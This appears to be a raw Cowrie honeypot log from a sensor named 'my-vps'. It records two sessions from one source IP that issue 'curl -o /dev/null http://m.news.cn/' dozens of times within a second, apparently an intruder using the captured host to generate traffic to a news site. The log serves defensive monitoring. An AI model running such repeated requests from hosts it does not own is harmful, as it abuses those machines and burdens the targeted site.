{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.180339Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.201750Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.202648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.219650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.220431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.240673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.241492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.244533Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.258355Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.259271Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.268919Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.278769Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.279634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.289698Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.296928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.297711Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.317872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.318587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.324339Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.334858Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.335838Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.338905Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.352804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.353596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.373230Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.374335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.377826Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.382044Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.387817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.388442Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.407220Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.410705Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.414566Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.437039Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.438470Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.446989Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.448498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.459478Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.468673Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.478338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.479511Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.483943Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.486129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.487451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.490977Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.520104Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.521159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.524176Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.524766Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.526778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.560219Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.561156Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.563459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.564528Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.571578Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.596181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.597121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.601362Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.602159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.617748Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.632597Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.633476Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.638411Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.639221Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.669029Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.675403Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.676335Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.679155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.679803Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.681860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.712591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.713586Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.717254Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.718279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.726801Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.736072Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.747637Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.748540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.757596Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.758512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.772343Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.783783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.784789Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.802200Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.803155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.803833Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.817500Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.822128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.823074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.840892Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.841774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
